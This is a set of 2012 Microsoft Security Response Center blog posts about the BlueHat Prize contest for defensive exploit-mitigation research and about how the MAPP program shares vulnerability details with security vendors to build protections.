*No Purchase Necessary. Open only to registered event attendees 14+.Game ends 7/26/12. For additional details, see Official Rules posted on-site at the Microsoft booth.

BlueHat Prize v1.0 Finalists – One of These People Will Win $200,000 (AKA Mad Loot)!, 21 Jun 2012 00:00:00 +0000 more]]>

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team

Cool vulns, BlueHat, soldering irons, quantum teleportation

Rudeness, socks-n-sandals, licorice

When we announced the BlueHat Prize on August 3, 2011, we did something that no major vendor had ever done before – offer a large cash prize for defensive security research. While a few vendors and others were offering relatively small cash incentives for security researchers to find and report individual vulnerabilities, we decided that, as a platform provider, Microsoft would be most effective if it sought out new, platform-level, defensive technologies that could possibly help defend against entire classes of vulnerabilities. These defenses could help protect our own applications, and have the potential to protect third-party applications that run on our platform.

We received 20 entries to our inaugural BlueHat Prize contest, a response and participation from the security research community that exceeded our expectations. We now know contestants emerged from different areas of the security community – some from academia, some recognized names in the hacker community, and some from other venues entirely. Interestingly, about half of the entries poured in during the last few days – and even the last few hours and minutes— of the contest entry period. Also of note, most of the top-rated entries were among those last-minute submissions, perhaps substantiating the old adage that brilliance emerges under the glaring pressure of a looming deadline. One thing we learned from this experience was not to set future contest deadlines for midnight on a Sunday!

Getting down to business, here are the names of the three finalists, in alphabetical order:

Jared DeMott

Ivan Fratric

Vasilis Pappas

We will award the prizes to the winners at a 10 p.m. ceremony at our researcher appreciation party on July 26, 2012. We have notified the finalists that they have made it to the finals. The finalists won’t know who won which prize – the grand prize of $200,000 USD, the second prize of $50,000 USD, and the third prize of an MSDN subscription, valued at $10,000 USD – until we reveal it to them and the world live on July 26.

You can read a little about each of them and their proposed solutions on our BlueHat Prize contest site. After the contest is over, we’ll also be putting up the names and abstracts of the other contestants, so stay tuned for that update sometime after Black Hat.

For now, please join us as we congratulate all the contestants, and especially the three finalists. We appreciate their hard work, and are excited that we can help showcase their ideas that can help make advancements in platform-level security defense.

– Katie Moussouris

Senior Security Strategist, MSRC

Inside the MAPP program, 02 May 2012 22:39:00 +0000 more]]>


Maarten Van Horenbeeck

Senior Program Manager

Slicing covert channels, foraging in remote memory pools, and setting off page faults

The crackling sound of crypto breaking, warm vodka martni

Hi everyone,

Maarten here – my team manages the Microsoft Active Protections Program (MAPP) at Microsoft. MAPP gives defenders a head start by sharing vulnerability information with them so that protection signatures are ready at the same time as security updates.

Recently we have seen a fair amount of discussion around the MAPP program. We know that many customers and partners have questions about how MAPP works and how it helps protect customers, therefore I wanted to take this opportunity to explain how we work to facilitate the creation of active protections.

Our goal with MAPP is to have a transparent, effective program in place. As such, we routinely evaluate MAPP partners to ensure they are adhering to program guidelines, taking action to correct any partner deviations from our program charter. We are also continually looking to strengthen our technical and legal controls to help protect our customers.

Why the MAPP program?

Microsoft developed the MAPP program in 2008 in response to an increase in reverse-engineering occurring around our monthly security update releases. We recognized that there were many tools available that enabled security researchers and attackers alike to very quickly identify the root cause of a vulnerability, given the update binaries. We noted that defenders, such as antivirus or intrusion prevention vendors, were in a race against attackers to reverse-engineer our updates in order to create protection signatures.

Before the MAPP program, defenders were at a disadvantage because detecting exploits is difficult, especially if a security vendor does not have full information on the types of conditions that may trigger successful exploitation. A vendor could write a signature for every attack file they receive, but they would need to respond to every file individually, or spend significant amounts of time reverse- engineering our security updates themselves. By providing technical details about a vulnerability directly to defenders, we strengthen their ability to create more effective and accurate signatures in a shorter timeframe.

MAPP also helps to provide a first line of defense for customers who need, or want, to do their own testing prior to deploying our updates. Microsoft thoroughly tests security updates prior to release, however, we do not have the ability to test with all Line of Business applications that corporations develop in-house.

Given the fact that some customers prefer to perform in-house testing, which may delay installation of the security update, we sought partners that our customers already deployed , and could help protect against exploitation of software vulnerabilities. We found those partners in the anti-malware and intrusion prevention industries.

How does the MAPP program work?

Microsoft operates the MAPP program, free of charge, for security vendors that meet our minimum requirements on both the capability they have to protect customers and the number of customers they represent. One can find detailed information on our admission criteria here. We carefully vet and validate these criteria prior to admitting a new partner.

Each month, our team of security engineers work diligently to create information for our partners that helps them detect the exploitation of security vulnerabilities in our products. This data includes, but is not always limited to:

  • A detailed technical write-up on the vulnerability;
  • A step-by-step process that they can follow to parse an affected file format, or network protocol, that identifies which elements need to have particular values, or exceed specific boundaries, in order to trigger the security vulnerability;
  • Information on how to detect the vulnerability, or exploitation thereof (e.g. event log entries, or stack traces);
  • A Proof-of-Concept file that is in itself not malicious, but contains the specific condition that will trigger the vulnerability. Partners can leverage this file to test detection signatures they develop using the step-by-step process we provide.

We provide this information to participating vendors shortly in advance of the release of a security update. We base the timeframe on partners’ ability to release effective protections, while limiting the risk, should the information be inadvertently disclosed.

Once we provide the information, our engineers remain available to discuss, in detail, steps security vendors can take to detect exploitation of a vulnerability.

Our team also follows up with the partner vendors to better understand which vulnerabilities attackers are  exploiting in the wild, and where we need to improve guidance to account for specific exploitation methods. We regularly update guidance after the initial release to help increase the ability of partners to protect customers.

How the MAPP program helps protect customers

The MAPP program helps vendors build comprehensive detection for vulnerabilities that Microsoft acknowledges or addresses in a security bulletin. MAPP partners are not permitted to release their protection in advance of the security update release.

For example, In the case of an Office exploit, our detection guidance will describe how to parse the Office file and validate which part of the file, and which elements need to be malformed in order to trigger the vulnerability. Without MAPP data, vendors would –in many cases— need to “guess” which values could trigger a crash, and which could not, which reduces the effectiveness of their signatures.

Detection technology developed using MAPP data tends to be more accurate and more comprehensive than detection built without access to the information. Each month after the bulletin release, Microsoft follows up with each vendor individually to track the use of MAPP guidance across the signature base of our partners. When we identify that certain guidance is difficult to implement for our partner base, we work with partners to understand how we can improve the program and enable them to detect these threats more effectively.

The vulnerability addressed in MS10-087, CVE-2010-3333 is a good example. This particular issue affected our Rich Text Format (RTF) parser in Microsoft Office. Given we have had a small sample of bulletins in this particular component; many vendors did not have an effective way of parsing the file type. We worked with our MAPP vendors to develop a tool that would quickly identify malicious files, and distributed it to our partners, despite previously addressing the issue in a security update.

Risks and limitations

We recognize that there is the potential for vulnerability information to be misused. In order to limit this as much as possible, we have strong non-disclosure agreements (NDA)with our partners. Microsoft takes breaches of its  NDAs very seriously. When partners do not successfully protect our intellectual property, we take action, which may include removing the partner from our program.

In addition, we make sure to only release data shortly in advance of the security update. Prior to MAPP, vendors released detection within hours to days following the release of a security update. Today, we send MAPP data to our partners just as far in advance as they need to get that work done, only now, the protection is usually available when we release the update.

But MAPP also has its limitations. For instance, MAPP does not protect against the exploitation of unknown, zero-day vulnerabilities. In order for MAPP to be effective, Microsoft must be aware of the vulnerability before it can distribute guidance to its MAPP partners.

Additionally, MAPP is only useful to the degree that a product can protect against exploitation of the vulnerability. Intrusion Prevention Vendors may not always be best-positioned to detect exploits for Office vulnerabilities, as they may be encoded in a number of different ways across the network. In the same vein, host-based anti-malware products are often not best-positioned to protect against network- based exploits, such as the recent RDP vulnerability.

We recommend our customers work closely with their protection vendors to understand the abilities and limitations of each individual product.

The Value of MAPP

We believe that helping to strengthen community-based defense is key to protecting customers. The MAPP program provides a critical head-start to defenders, while working to minimize risk.

Microsoft is committed to helping customers by providing protection vendors across a wide variety of security industries with valuable protection information. The MAPP program is an important part of this strategy. While risk can never be completely eliminated, we believe the benefits of the program to our customers far outweigh the risks.



Maarten Van Horenbeeck
Senior Program Manager, Microsoft Security Response Center

BlueHat Prize entries: The final tally is…, 03 Apr 2012 17:54:00 +0000 more]]>

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team

Cool vulns, BlueHat, soldering irons, quantum teleportation

Rudeness, socks-n-sandals, licorice

The entries are in! After a last-minute wave of fresh entries to the first-ever BlueHat Prize, the final count for this year’s contest stands at twenty qualified proposals. The final entry reached our inboxes at 11:51pm on April 1. (Unfortunately, a contest entry that arrived 17 minutes later – at eight minutes after 11:59pm on April 2 – had to be disqualified out of fairness to the others, and to keep our competition in compliance with Washington State’s rules for such events.)


And now? Now begins the hard and exciting part – evaluating the received entries. The BlueHat Prize Board now starts the judging process, examining, testing and discussing each entry. We expect some lively arguments and look forward to introducing the competition winners to the world at Black Hat in July. In the meantime, we truly thank everyone who delivered a contest entry, as well as everyone who spent time thoughtfully considering the issue.


Talk to you in July –

Katie Moussouris

Senior Security Strategist, Microsoft Security Response Center.

Peace Games – BlueHat Prize Update and Countdown, 26 Mar 2012 11:55:00 +0000 more]]>

Katie Moussouris

Senior Security Strategist Lead, Head of Microsoft’s Security Community and Strategy Team

Cool vulns, BlueHat, soldering irons, quantum teleportation

Rudeness, socks-n-sandals, licorice

In the film WarGames, an artificial intelligence program named Joshua asked the main character, a teenage hacker, the now famous question, “Shall we play a game?” When Microsoft announced the BlueHat Prize at the Black Hat Briefings in Las Vegas last summer, we asked a different question of the security researchers of the world, focused on defense.

Microsoft is offering over $250,000 in cash and prizes to security researchers who submit the best new security defense technology that meets the contest criteria. The top prize is $200,000 in cash, and the “mad loot” still could be yours!

With just under a week left in the entry period for the contest, which closes April 1, security researchers still have time to enter the competition to win the first and largest prize a vendor has offered for security defense research.

The ability to defeat the latest exploit mitigation technologies on various platforms is an extremely rare skill, as we have seen with several existing competitions that focus on vulnerability exploitation. Taking that knowledge to the level of helping to design new or enhanced mitigation technologies to help defend against exploit techniques like heapspray or Return Oriented Programming (ROP) was a challenge that we were hoping would garner at least as much interest.

The BlueHat Prize contest has exceeded our expectations for participation. So far we’ve had ten entries to the competition, the last four of which arrived over the past couple of weeks – an impressive showing, considering the difficulty of the problem we posed and the very small estimated number of individuals worldwide who possess the knowledge and expertise to seriously compete.

The entries cover a wide variety of ideas designed to help defend against different exploitation techniques, and it’s been great to see fresh insight into these technical areas. We’ve also been excited to see who the contestants are who have chosen to compete for the prize – some of them are security researchers with great track records in the security community, some are from academia, and some are from other venues altogether.

For those beautiful minds who have yet to enter their ideas for the contest, here are some highlights from the official rules:

– Complete entries must be received by midnight Pacific Time April 1, 2012.

– Complete entries must include a verbal description of the idea in English, as well as prototype code to show the exploit mitigation idea in action.

– For an entry to be valid, one of the criteria is that it should not be public at the time of entry (i.e., it must be new). However, a valid entry can be a new improvement on existing exploit mitigation techniques.

– If you have more questions, see the FAQ on the BlueHat Prize website or, if you don’t see your question answered there, contact the BlueHat Prize team.

With over $250,000 in cash and prizes on the line, we are excited that the first BlueHat Prize contest has already garnered great participation. One of my favorite quotes is from the great hockey player Wayne Gretzky, and it applies here for sure: “You miss 100% of the shots you don’t take.”

So, shall we play a game?

-Katie Moussouris

Senior Security Strategist, Microsoft Security Response Center

Follow Katie on Twitter.